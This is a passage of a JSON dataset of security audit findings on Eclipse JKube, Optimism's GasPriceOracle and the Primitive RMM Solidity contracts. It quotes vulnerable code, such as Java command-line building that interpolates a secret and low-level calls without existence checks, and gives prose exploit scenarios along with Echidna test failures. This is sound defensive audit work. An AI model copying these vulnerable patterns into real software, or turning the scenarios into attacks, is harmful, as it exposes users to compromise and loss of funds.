attacker. Recommendations Short term, investigate the use of mlock/mlockall on supported platforms to prevent memory pages that contain key material to be paged out. Explicitly zero out the key material as soon as it is no longer needed. Long term, document the key material memory management and the threat model around it.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "1. Insecure defaults in generated artifacts ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-eclipse-jkube-securityreview.pdf", + "body": "JKube can generate Kubernetes deployment artifacts and deploy applications using those artifacts. By default, many of the security features oered by Kubernetes are not enabled in these artifacts. This can cause the deployed applications to have more permissions than their workload requires. If such an application were compromised, the permissions would enable the attacker to perform further attacks against the container or host. Kubernetes provides several ways to further limit these permissions, some of which are documented in appendix E . Similarly, the generated artifacts do not employ some best practices, such as referencing container images by hash, which could help prevent certain supply chain attacks. We compiled several of the examples contained in the quickstarts folder and analyzed them. We observed instances of the following problems in the artifacts produced by JKube: Pods have no associated network policies . Dockerles have base image references that use the latest tag. Container image references use the latest tag, or no tag, instead of a named tag or a digest. Resource (CPU, memory) limits are not set. Containers do not have the allowPrivilegeEscalation setting set. Containers are not congured to use a read-only lesystem. Containers run as the root user and have privileged capabilities. Seccomp proles are not enabled on containers. Service account tokens are mounted on pods where they may not be needed. Exploit Scenario An attacker compromises one application running on a Kubernetes cluster. The attacker takes advantage of the lax security conguration to move laterally and attack other system components. Recommendations Short term, improve the default generated conguration to enhance the security posture of applications deployed using JKube, while maintaining compatibility with most common scenarios. Apply automatic tools such as Checkov during development to review the conguration generated by JKube and identify areas for improvement. Long term, implement mechanisms in JKube to allow users to congure more advanced security features in a convenient way. References Appendix D: Docker Recommendations Appendix E: Hardening Containers Run via Kubernetes", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Undetermined" + ] + }, + { + "title": "2. Risk of command line injection from secret ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-eclipse-jkube-securityreview.pdf", + "body": "As part of the Spring Boot watcher functionality, JKube executes a second Java process. The command line for this process interpolates an arbitrary secret, making it unsafe. This command line is then tokenized by separating on spaces. If the secret contains spaces, this process could allow an attacker to add arbitrary arguments and command-line ags and modify the behavior of this command execution. StringBuilder buffer = new StringBuilder( \"java -cp \" ); (...) buffer.append( \" -Dspring.devtools.remote.secret=\" ); buffer.append( remoteSecret ); buffer.append( \" org.springframework.boot.devtools.RemoteSpringApplication \" ); buffer.append(url); try { String command = buffer.toString(); log.debug( \"Running: \" + command); final Process process = Runtime.getRuntime().exec(command) ; Figure 2.1: A secret is used without sanitization on a command string that is then executed. ( jkube/jkube-kit/jkube-kit-spring-boot/src/main/java/org/eclipse/jkube/sp ringboot/watcher/SpringBootWatcher.java#136171 ) Exploit Scenario An attacker forks an open source project that uses JKube and Spring Boot, improves it in some useful way, and introduces a malicious spring.devtools.remote.secret secret in application.properties . A user then nds this forked project and sets it up locally. When the user runs mvn k8s:watch , JKube invokes a command that includes attacker-controlled content, compromising the users machine. Recommendations Short term, rewrite the command-line building code to use an array of arguments instead of a single command-line string. Java provides several variants of the exec method, such as exec(String[]) , which are safer to use when user-provided input is involved. Long term, integrate static analysis tools in the development process and CI/CD pipelines, such as Semgrep and CodeQL, to detect instances of similar problems early on. Review uses of user-controlled input to ensure they are sanitized if necessary and processed safely. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Medium" + ] + }, + { + "title": "1. Risk of miscongured GasPriceOracle state variables that can lock L2 ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-11-optimism-securityreview.pdf", + "body": "When bootstrapping the L2 network operated by op-geth , the GasPriceOracle contract is pre-deployed to L2, and its contract state variables are used to specify the L1 costs to be charged on L2. Three state variables are used to compute the costs decimals , overhead , and scalar which can be updated through transactions sent to the node. However, these state variables could be miscongured in a way that sets gas prices high enough to prevent transactions from being processed. For example, if overhead were set to the maximum value, a 256-bit unsigned integer, the subsequent transactions would not be accepted. In an end-to-end test of the above example, contract bindings used in op-e2e tests (such as the GasPriceOracle bindings used to update the state variables) were no longer able to make subsequent transactions/updates, as calls to SetOverhead or SetDecimals resulted in a deadlock. Sending a transaction directly through the RPC client did not produce a transaction receipt that could be fetched. Recommendations Short term, implement checks to ensure that GasPriceOracle parameters can be updated if fee parameters were previously miscongured. This could be achieved by adding an exception to GasPriceOracle fees when the contract owner calls methods within the contract or by setting a maximum fee cap. Long term, develop operational procedures to ensure the system is not deployed in or otherwise entered into an unexpected state as a result of operator actions. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", + "labels": [ + "Trail of Bits", + "Severity: Undetermined", + "Difficulty: Medium" + ] + }, + { + "title": "1. Transfer operations may silently fail due to the lack of contract existence checks ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", + "body": "The pool fails to check that a contract exists before performing transfers. As a result, the pool may assume that failed transactions involving destroyed tokens or tokens that have not yet been deployed were successful. Transfers.safeTransfer , TransferHelper.safeTransfer , and TransferHelper.safeTransferFrom use low-level calls to perform transfers without conrming the contracts existence: ) internal { ( bool success , bytes memory returnData) = address (token).call( abi.encodeWithSelector(token.transfer.selector, to, value) ); require (success && (returnData.length == 0 || abi.decode(returnData, ( bool ))), \"Transfer fail\" ); } Figure 1.1: rmm-core/contracts/libraries/Transfers.sol#16-21 The Solidity documentation includes the following warning: The low-level functions call, delegatecall and staticcall return true as their rst return value if the account called is non-existent, as part of the design of the EVM. Account existence must be checked prior to calling if needed. Figure 1.2: The Solidity documentation details the necessity of executing existence checks before performing low-level calls. Therefore, if the tokens to be transferred have not yet been deployed or have been destroyed, safeTransfer and safeTransferFrom will return success even though the transfer was not executed. Exploit Scenario The pool contains two tokens: A and B. The A token has a bug, and the contract is destroyed. Bob is not aware of the issue and swaps 1,000 B tokens for A tokens. Bob successfully transfers 1,000 B tokens to the pool but does not receive any A tokens in return. As a result, Bob loses 1,000 B tokens. Recommendations Short term, implement a contract existence check before the low-level calls in Transfer.safeTransfer , TransferHelper.safeTransfer , and TransferHelper.safeTransferFrom . This will ensure that a swap will revert if the token to be bought no longer exists, preventing the pool from accepting the token to be sold without returning any tokens in exchange. Long term, avoid implementing low-level calls. If such calls are unavoidable, carefully review the Solidity documentation , particularly the Warnings section, before implementing them to ensure that they are implemented correctly.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "2. Project dependencies contain vulnerabilities ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", + "body": "Although dependency scans did not indicate a direct threat to the project under review, yarn audit identied dependencies with known vulnerabilities. Due to the sensitivity of the deployment code and its environment, it is important to ensure dependencies are not malicious. Problems with dependencies in the JavaScript community could have a signicant eect on the repositories under review. The output below details these issues. CVE ID", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Low" + ] + }, + { + "title": "3. Anyone could steal pool tokens earned interest ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", + "body": "If a PrimitiveEngine contract is deployed with certain ERC20 tokens, unexpected token interest behavior could allow token interest to count toward the number of tokens required for the deposit , allocate , create , and swap functions, allowing the user to avoid paying in full. Liquidity providers use the deposit function to increase the liquidity in a position. The following code within the function veries that the pool has received at least the minimum number of tokens required by the protocol: if (delRisky != 0 ) balRisky = balanceRisky(); if (delStable != 0 ) balStable = balanceStable(); IPrimitiveDepositCallback( msg.sender ).depositCallback(delRisky, delStable, data); // agnostic payment if (delRisky != 0 ) checkRiskyBalance(balRisky + delRisky); if (delStable != 0 ) checkStableBalance(balStable + delStable); emit Deposit( msg.sender , recipient, delRisky, delStable); Figure 3.1: rmm-core/contracts/PrimitiveEngine.sol#213-217 Assume that both delRisky and delStable are positive. First, the code fetches the current balances of the tokens. Next, the depositCallback function is called to transfer the required number of each token to the pool contract. Finally, the code veries that each tokens balance has increased by at least the required amount. There could be a token that allows token holders to earn interest simply because they are token holders. To retrieve this interest, token holders could call a certain function to calculate the interest earned and increase their balances. An attacker could call this function from within the depositCallback function to pay out interest to the pool contract. This would increase the pools token balance, decreasing the number of tokens that the user needs to transfer to the pool contract to pass the balance check (i.e., the check conrming that the balance has suciently increased). In eect, the users token payment obligation is reduced because the interest accounts for part of the required balance increase. To date, we have not identied a token contract that contains such a functionality; however, it is possible that one exists or could be created. Exploit Scenario Bob deploys a PrimitiveEngine contract with token1 and token2. Token1 allows its holders to earn passive interest. Anyone can call get_interest(address) to make a certain token holders interest be claimed and added to the token holders balance. Over time, the pool can claim 1,000 tokens. Eve calls deposit , and the pool requires Eve to send 1,000 tokens. Eve calls get_interest(address) in the depositCallback function instead of sending the tokens, depositing to the pool without paying the minimum required tokens. Recommendations Short term, add documentation explaining to users that the use of interest-earning tokens can reduce the standard payments for deposit , allocate , create , and swap . Long term, using the Token Integration Checklist (appendix C), generate a document detailing the shortcomings of tokens with certain features and the impacts of their use in the Primitive protocol. That way, users will not be alarmed if the use of a token with nonstandard features leads to unexpected results.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Medium" + ] + }, + { + "title": "4. Solidity compiler optimizations can be problematic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", + "body": "The Primitive contracts have enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed . Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past . A high-severity bug in the emscripten -generated solc-js compiler used by True and Remix persisted until late 2018. The x for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6 . More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe . It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizationsor in the Emscripten transpilation to solc-js causes a security vulnerability in the Primitive contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Low" + ] + }, + { + "title": "5. Lack of zero-value checks on functions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", + "body": "Certain setter functions fail to validate incoming arguments, so callers can accidentally set important state variables to the zero address. function deposit( address recipient, uint256 delRisky, uint256 delStable, bytes calldata data ) external override lock { if (delRisky == 0 && delStable == 0 ) revert ZeroDeltasError(); margins[recipient].deposit(delRisky, delStable); // state update uint256 balRisky; uint256 balStable; if (delRisky != 0 ) balRisky = balanceRisky(); if (delStable != 0 ) balStable = balanceStable(); IPrimitiveDepositCallback( msg.sender ).depositCallback(delRisky, delStable, data); // agnostic payment if (delRisky != 0 ) checkRiskyBalance(balRisky + delRisky); if (delStable != 0 ) checkStableBalance(balStable + delStable); emit Deposit( msg.sender , recipient, delRisky, delStable); } Figure 5.1: rmm-core/contracts/PrimitiveEngine.sol#L201-L219 Among others, the following functions lack zero-value checks on their arguments: PrimitiveEngine.deposit PrimitiveEngine.withdraw PrimitiveEngine.allocate PrimitiveEngine.swap PositionDescriptor.constructor MarginManager.deposit MarginManager.withdraw SwapManager.swap CashManager.unwrap CashManager.sweepToken Exploit Scenario Alice, a user, mistakenly provides the zero address as an argument when depositing for a recipient. As a result, her funds are saved in the margins of the zero address instead of a dierent address. Recommendations Short term, add zero-value checks for all function arguments to ensure that users cannot mistakenly set incorrect values, misconguring the system. Long term, use Slither, which will catch functions that do not have zero-value checks.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "6. uint256.percentage() and int256.percentage() are not inverses of each other ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", + "body": "The Units library provides two percentage helper functions to convert unsigned integers to signed 64x64 xed-point values, and vice versa. Due to rounding errors, these functions are not direct inverses of each other. /// @notice Converts denormalized percentage integer to a fixed point 64.64 number /// @dev Convert unsigned 256-bit integer number into signed 64.64 fixed point number /// @param denorm Unsigned percentage integer with precision of 1e4 /// @return Signed 64.64 fixed point percentage with precision of 1e4 function percentage( uint256 denorm) internal pure returns ( int128 ) { return denorm. divu (PERCENTAGE); } /// @notice Converts signed 64.64 fixed point percentage to a denormalized percetage integer /// @param denorm Signed 64.64 fixed point percentage /// @return Unsigned percentage denormalized with precision of 1e4 function percentage( int128 denorm) internal pure returns ( uint256 ) { return denorm. mulu (PERCENTAGE); } Figure 6.1: rmm-core/contracts/libraries/Units.sol#L53-L66 These two functions use ABDKMath64x64.divu() and ABDKMath64x64.mulu() , which both round downward toward zero. As a result, if a uint256 value is converted to a signed 64x64 xed point and then converted back to a uint256 value, the result will not equal the original uint256 value: function scalePercentages (uint256 value ) public { require(value > Units.PERCENTAGE); int128 signedPercentage = value.percentage(); uint256 unsignedPercentage = signedPercentage.percentage(); if(unsignedPercentage != value) { emit AssertionFailed( \"scalePercentages\" , signedPercentage, unsignedPercentage); assert(false); } Figure 6.2: rmm-core/contracts/LibraryMathEchidna.sol#L48-L57 used Echidna to determine this property violation: Analyzing contract: /rmm-core/contracts/LibraryMathEchidna.sol:LibraryMathEchidna scalePercentages(uint256): failed! Call sequence: scalePercentages(10006) Event sequence: Panic(1), AssertionFailed(\"scalePercentages\", 18457812120153777346, 10005) Figure 6.3: Echidna results Exploit Scenario 1. uint256.percentage() 10006.percentage() = 1.0006 , which truncates down to 1. 2. int128.percentage() 1.percentage() = 10000 . 3. The assertion fails because 10006 != 10000 . Recommendations Short term, either remove the int128.percentage() function if it is unused in the system or ensure that the percentages round in the correct direction to minimize rounding errors. Long term, use Echidna to test system and mathematical invariants.", + "labels": [ + "Trail of Bits", + "Severity: Undetermined", + "Difficulty: Low" + ] + }, + { + "title": "7. Users can allocate tokens to a pool at the moment the pool reaches maturity ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", + "body": "Users can allocate tokens to a pool at the moment the pool reaches maturity, which creates an opportunity for attackers to front-run or update the curve right before the maturity period ends. function allocate ( bytes32 poolId , address recipient , uint256 delRisky , uint256 delStable , bool fromMargin , bytes calldata data ) external override lock returns ( uint256 delLiquidity ) { if (delRisky == 0 || delStable == 0 ) revert ZeroDeltasError(); Reserve.Data storage reserve = reserves[poolId]; if (reserve.blockTimestamp == 0 ) revert UninitializedError(); uint32 timestamp = _blockTimestamp(); if (timestamp > calibrations[poolId].maturity) revert PoolExpiredError(); uint256 liquidity0 = (delRisky * reserve.liquidity) / uint256 (reserve.reserveRisky); uint256 liquidity1 = (delStable * reserve.liquidity) / uint256 (reserve.reserveStable); delLiquidity = liquidity0 < liquidity1 ? liquidity0 : liquidity1; if (delLiquidity == 0 ) revert ZeroLiquidityError(); liquidity[recipient][poolId] += delLiquidity; // increase position liquidity reserve.allocate(delRisky, delStable, delLiquidity, timestamp); // increase reserves and liquidity if (fromMargin) { margins.withdraw(delRisky, delStable); // removes tokens from `msg.sender` margin account } else { ( uint256 balRisky , uint256 balStable ) = (balanceRisky(), balanceStable()); IPrimitiveLiquidityCallback( msg.sender ).allocateCallback(delRisky, delStable, data); // agnostic payment checkRiskyBalance(balRisky + delRisky); checkStableBalance(balStable + delStable); } emit Allocate( msg.sender , recipient, poolId, delRisky, delStable); } Figure 7.1: rmm-core/contracts/PrimitiveEngine.sol#L236-L268 Recommendations Short term, document the expected behavior of transactions to allocate funds into a pool that has just reached maturity and analyze the front-running risk. Long term, analyze all front-running risks on all transactions in the system.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "8. Possible front-running vulnerability during BUFFER time ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", + "body": "The PrimitiveEngine.swap function permits swap transactions until 120 seconds after maturity, which could enable miners to front-run swap transactions and engage in malicious behavior. The constant tau value may allow miners to prot from front-running transactions when the swap curve is locked after maturity. SwapDetails memory details = SwapDetails({ recipient: recipient, poolId: poolId, deltaIn: deltaIn, deltaOut: deltaOut, riskyForStable: riskyForStable, fromMargin: fromMargin, toMargin: toMargin, timestamp: _blockTimestamp() }); uint32 lastTimestamp = _updateLastTimestamp(details.poolId); // updates lastTimestamp of `poolId` if (details.timestamp > lastTimestamp + BUFFER) revert PoolExpiredError(); // 120s buffer to allow final swaps Figure 8.1: rmm-core/contracts/PrimitiveEngine.sol#L314-L326 Recommendations Short term, perform an o-chain analysis on the curve and the swaps to determine the impact of a front-running attack on these transactions. Long term, perform an additional economic analysis with historical data on pools to determine the impact of front-running attacks on all functionality in the system.", + "labels": [ + "Trail of Bits", + "Severity: Undetermined", + "Difficulty: Undetermined" + ] + }, + { + "title": "9. Inconsistency in allocate and remove functions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", + "body": "The allocate and remove functions do not have the same interface, as one would expect. The allocate function allows users to set the recipient of the allocated liquidity and choose whether the funds will be taken from the margins or sent directly. The remove function unallocates the liquidity from the pool and sends the tokens to the msg.sender ; with this function, users cannot set the recipient of the tokens or choose whether the tokens will be credited to their margins for future use or directly sent back to them. function allocate ( bytes32 poolId , address recipient , uint256 delRisky , uint256 delStable , bool fromMargin , bytes calldata data ) external override lock returns ( uint256 delLiquidity ) { if (delRisky == 0 || delStable == 0 ) revert ZeroDeltasError(); Reserve.Data storage reserve = reserves[poolId]; if (reserve.blockTimestamp == 0 ) revert UninitializedError(); uint32 timestamp = _blockTimestamp(); if (timestamp > calibrations[poolId].maturity) revert PoolExpiredError(); uint256 liquidity0 = (delRisky * reserve.liquidity) / uint256 (reserve.reserveRisky); uint256 liquidity1 = (delStable * reserve.liquidity) / uint256 (reserve.reserveStable); delLiquidity = liquidity0 < liquidity1 ? liquidity0 : liquidity1; if (delLiquidity == 0 ) revert ZeroLiquidityError(); liquidity[recipient][poolId] += delLiquidity; // increase position liquidity reserve.allocate(delRisky, delStable, delLiquidity, timestamp); // increase reserves and liquidity if (fromMargin) { margins.withdraw(delRisky, delStable); // removes tokens from `msg.sender` margin account } else { ( uint256 balRisky , uint256 balStable ) = (balanceRisky(), balanceStable()); IPrimitiveLiquidityCallback( msg.sender ).allocateCallback(delRisky, delStable, data); // agnostic payment checkRiskyBalance(balRisky + delRisky); checkStableBalance(balStable + delStable); } emit Allocate( msg.sender , recipient, poolId, delRisky, delStable); } Figure 9.1: rmm-core/contracts/PrimitiveEngine.sol#L236-L268 Recommendations Short term, either document the design decision or add the logic to the remove function allowing users to set the recipient and to choose whether the tokens should be credited to their margins . Long term, make sure to document design decisions and the rationale behind them, especially for behavior that may not be obvious.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Undetermined" + ] + }, + { + "title": "10. Areas of the codebase that are inconsistent with the documentation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", + "body": "The Primitive codebase contains clear documentation and mathematical analysis denoting the intended behavior of the system. However, we identied certain areas in which the implementation does not match the white paper, including the following: Expected range for the gamma value of a pool. The white paper denes 10,000 as 100% in the smart contract; however, the contract checks that the provided gamma is between 9,000 (inclusive) and 10,000 (exclusive); if it is not within this range, the pool reverts with a GammaError . The white paper should be updated to reect the behavior of the code in these areas. Recommendations Short term, review and properly document all areas of the codebase with this gamma range check. Long term, ensure that the formal specication matches the expected behavior of the protocol.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Undetermined" + ] + }, + { + "title": "11. Allocate and remove are not exact inverses of each other ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", + "body": "Due to the rounding logic used in the codebase, when users allocate funds into a system, they may not receive the same amount back when they remove them. When funds are allocated into a system, the values are rounded down (through native truncation) when they are added to the reserves: /// @notice Add to both reserves and total supply of liquidity /// @param reserve Reserve storage to manipulate /// @param delRisky Amount of risky tokens to add to the reserve /// @param delStable Amount of stable tokens to add to the reserve /// @param delLiquidity Amount of liquidity created with the provided tokens /// @param blockTimestamp Timestamp used to update cumulative reserves function allocate ( Data storage reserve, uint256 delRisky , uint256 delStable , uint256 delLiquidity , uint32 blockTimestamp ) internal { update(reserve, blockTimestamp); reserve.reserveRisky += delRisky.toUint128(); reserve.reserveStable += delStable.toUint128(); reserve.liquidity += delLiquidity.toUint128(); } Figure 11.1: rmm-core/contracts/libraries/Reserve.sol#L70-L87 When funds are removed from the reserves, they are similarly truncated: /// @notice Remove from both reserves and total supply of liquidity /// @param reserve Reserve storage to manipulate /// @param delRisky Amount of risky tokens to remove to the reserve /// @param delStable Amount of stable tokens to remove to the reserve /// @param delLiquidity Amount of liquidity removed from total supply /// @param blockTimestamp Timestamp used to update cumulative reserves function remove( Data storage reserve, uint256 delRisky, uint256 delStable, uint256 delLiquidity, uint32 blockTimestamp ) internal { update(reserve, blockTimestamp); reserve.reserveRisky -= delRisky.toUint128(); reserve.reserveStable -= delStable.toUint128(); reserve.liquidity -= delLiquidity.toUint128(); } Figure 11.2: rmm-core/contracts/libraries/Reserve.sol#L89-L106 We used the following Echidna property to test this behavior: function check_allocate_remove_inverses( uint256 randomId, uint256 intendedLiquidity, bool fromMargin ) public { AllocateCall memory allocate; allocate.poolId = Addresses.retrieve_created_pool(randomId); retrieve_current_pool_data(allocate.poolId, true ); intendedLiquidity = E2E_Helper.one_to_max_uint64(intendedLiquidity); allocate.delRisky = (intendedLiquidity * precall.reserve.reserveRisky) / precall.reserve.liquidity; allocate.delStable = (intendedLiquidity * precall.reserve.reserveStable) / precall.reserve.liquidity; uint256 delLiquidity = allocate_helper(allocate); // these are calculated the amount returned when remove is called ( uint256 removeRisky, uint256 removeStable) = remove_should_succeed(allocate.poolId, delLiquidity); emit AllocateRemoveDifference(allocate.delRisky, removeRisky); emit AllocateRemoveDifference(allocate.delStable, removeStable); assert (allocate.delRisky == removeRisky); assert (allocate.delStable == removeStable); assert (intendedLiquidity == delLiquidity); } Figure 11.3: rmm-core/contracts/libraries/Reserve.sol#L89-L106 In considering this rounding logic, we used Echidna to calculate the most optimal allocate value for an amount of liquidity, which resulted 1,920,041,647,503 as the dierence in the amount allocated and the amount removed. check_allocate_remove_inverses(uint256,uint256,bool): failed! Call sequence: create_new_pool_should_not_revert(113263940847354084267525170308314,0,12,58,414705177,292070 35433870938731770491094459037949100611312053389816037169023399245174) from: 0x0000000000000000000000000000000000020000 Gas: 0xbebc20 check_allocate_remove_inverses(513288669432172152578276403318402760987129411133329015270396, 675391606931488162786753316903883654910567233327356334685,false) from: 0x1E2F9E10D02a6b8F8f69fcBf515e75039D2EA30d Event sequence: Panic(1), Transfer(6361150874), Transfer(64302260917206574294870), AllocateMarginBalance(0, 0, 6361150874, 64302260917206574294870), Transfer(6361150874), Transfer(64302260917206574294870), Allocate(6361150874, 64302260917206574294870), Remove(6361150873, 64302260915286532647367), AllocateRemoveDifference(6361150874, 6361150873), AllocateRemoveDifference( 64302260917206574294870, 64302260915286532647367 ) Figure 11.4: Echidna results Exploit Scenario Alice, a Primitive user, determines a specic amount of liquidity that she wants to put into the system. She calculates the required risky and stable tokens to make the trade, and then allocates the funds to the pool. Due to the rounding direction in the allocate operation and the pool, she receives less than she expected after removing her liquidity. Recommendations Short term, perform additional analysis to determine a safe delta value to allow the allocate and remove operations to happen. Document this issue for end users to ensure that they are aware of the rounding behavior. Long term, use Echidna to test system and mathematical invariants.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Low" + ] + }, + { + "title": "12. scaleToX64() and scalefromX64() are not inverses of each other ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", + "body": "The Units library provides the scaleToX64() and scalefromX64() helper functions to convert unsigned integers to signed 64x64 xed-point values, and vice versa. Due to rounding errors, these functions are not direct inverses of each other. /// @notice Converts unsigned 256-bit wei value into a fixed point 64.64 number /// @param value Unsigned 256-bit wei amount, in native precision /// @param factor Scaling factor for `value`, used to calculate decimals of `value` /// @return y Signed 64.64 fixed point number scaled from native precision function scaleToX64 ( uint256 value , uint256 factor ) internal pure returns ( int128 y ) { uint256 scaleFactor = PRECISION / factor; y = value.divu(scaleFactor); } Figure 12.1: rmm-core/contracts/libraries/Units.sol#L35-L42 These two functions use ABDKMath64x64.divu() and ABDKMath64x64.mulu() , which both round downward toward zero. As a result, if a uint256 value is converted to a signed 64x64 xed point and then converted back to a uint256 value, the result will not equal the original uint256 value: /// @notice Converts signed fixed point 64.64 number into unsigned 256-bit wei value /// @param value Signed fixed point 64.64 number to convert from precision of 10^18 /// @param factor Scaling factor for `value`, used to calculate decimals of `value` /// @return y Unsigned 256-bit wei amount scaled to native precision of 10^(18 - factor) function scalefromX64 ( int128 value , uint256 factor ) internal pure returns ( uint256 y ) { uint256 scaleFactor = PRECISION / factor; y = value.mulu(scaleFactor); } Figure 12.2: rmm-core/contracts/libraries/Units.sol#L44-L51 We used the following Echidna property to test this behavior: function scaleToAndFromX64Inverses (uint256 value , uint256 _decimals ) public { // will enforce factor between 0 - 12 uint256 factor = _decimals % ( 13 ); // will enforce scaledFactor between 1 - 10**12 , because 10**0 = 1 uint256 scaledFactor = 10 **factor; int128 scaledUpValue = value.scaleToX64(scaledFactor); uint256 scaledDownValue = scaledUpValue.scalefromX64(scaledFactor); assert(scaledDownValue == value); } Figure 12.3: contracts/crytic/LibraryMathEchidna.sol scaleToAndFromX64Inverses(uint256,uint256): failed! Call sequence: scaleToAndFromX64Inverses(1,0) Event sequence: Panic(1) Figure 12.4: Echidna results Recommendations Short term, ensure that the percentages round in the correct direction to minimize rounding errors. Long term, use Echidna to test system and mathematical invariants.", + "labels": [ + "Trail of Bits", + "Severity: Undetermined", + "Difficulty: Low" + ] + }, + { + "title": "13. getCDF always returns output in the range of (0, 1) ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", + "body": "CumulativeNormalDistribution provides the getCDF function to calculate an approximation of the cumulative distribution function, which should result in (0, 1] ; however, the getCDF function could return 1 . /// @notice Uses Abramowitz and Stegun approximation: /// https://en.wikipedia.org/wiki/Abramowitz_and_Stegun /// @dev Maximum error: 3.15x10-3 /// @return Standard Normal Cumulative Distribution Function of `x` function getCDF( int128 x) internal pure returns ( int128 ) { int128 z = x.div(CDF3); int128 t = ONE_INT.div(ONE_INT.add(CDF0.mul(z.abs()))); int128 erf = getErrorFunction(z, t); if (z < 0 ) { erf = erf.neg(); } int128 result = (HALF_INT).mul(ONE_INT.add(erf)); return result; } Figure 13.1: rmm-core/contracts/libraries/CumulativeNormalDistribution.sol#L24-L37 We used the following Echidna property to test this behavior. function CDFCheckRange( uint128 x, uint128 neg) public { int128 x_x = realisticCDFInput(x, neg); int128 res = x_x.getCDF(); emit P(x_x, res, res.toInt()); assert (res > 0 && res.toInt() < 1 ); } Figure 13.2: rmm-core/contracts/LibraryMathEchidna.sol CDFCheckRange(uint128,uint128): failed! Call sequence: CDFCheckRange(168951622815827493037,1486973755574663235619590266651) Event sequence: Panic(1), P(168951622815827493037, 18446744073709551616, 1) Figure 13.3: Echidna results Recommendations Short term, perform additional analysis to determine whether this behavior is an issue for the system. Long term, use Echidna to test system and mathematical invariants.", + "labels": [ + "Trail of Bits", + "Severity: Undetermined", + "Difficulty: Low" + ] + }, + { + "title": "14. Lack of data validation on withdrawal operations ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", + "body": "The withdraw function allows users to specify the recipient to send funds to. Due to a lack of data validation, the address of the engine could be set as the recipient. As a result, the tokens will be transferred directly to the engine itself. /// @inheritdoc IPrimitiveEngineActions function withdraw ( address recipient , uint256 delRisky , uint256 delStable ) external override lock { if (delRisky == 0 && delStable == 0 ) revert ZeroDeltasError(); margins.withdraw(delRisky, delStable); // state update if (delRisky != 0 ) IERC20(risky).safeTransfer(recipient, delRisky); if (delStable != 0 ) IERC20(stable).safeTransfer(recipient, delStable); emit Withdraw( msg.sender , recipient, delRisky, delStable); } Figure 14.1: rmm-core/contracts/PrimitiveEngine.sol#L221-L232 We used the following Echidna property to test this behavior. function withdraw_with_only_non_zero_addr( address recipient, uint256 delRisky, uint256 delStable ) public { require (recipient != address ( 0 )); //ensures that delRisky and delStable are at least 1 and not too large to overflow the deposit delRisky = E2E_Helper.one_to_max_uint64(delRisky); delStable = E2E_Helper.one_to_max_uint64(delStable); MarginHelper memory senderMargins = populate_margin_helper( address ( this )); if (senderMargins.marginRisky < delRisky || senderMargins.marginStable < delStable) { withdraw_should_revert(recipient, delRisky, delStable); } else { withdraw_should_succeed(recipient, delRisky, delStable); } } function withdraw_should_succeed ( address recipient , uint256 delRisky , uint256 delStable ) internal { MarginHelper memory precallSender = populate_margin_helper( address ( this )); MarginHelper memory precallRecipient = populate_margin_helper(recipient); uint256 balanceRecipientRiskyBefore = risky.balanceOf(recipient); uint256 balanceRecipientStableBefore = stable.balanceOf(recipient); uint256 balanceEngineRiskyBefore = risky.balanceOf( address (engine)); uint256 balanceEngineStableBefore = stable.balanceOf( address (engine)); ( bool success , ) = address (engine).call( abi.encodeWithSignature( \"withdraw(address,uint256,uint256)\" , recipient, delRisky, delStable) ); if (!success) { assert( false ); return ; } { assert_post_withdrawal(precallSender, precallRecipient, recipient, delRisky, delStable); //check token balances uint256 balanceRecipientRiskyAfter = risky.balanceOf(recipient); uint256 balanceRecipientStableAfter = stable.balanceOf(recipient); uint256 balanceEngineRiskyAfter = risky.balanceOf( address (engine)); uint256 balanceEngineStableAfter = stable.balanceOf( address (engine)); emit DepositWithdraw( 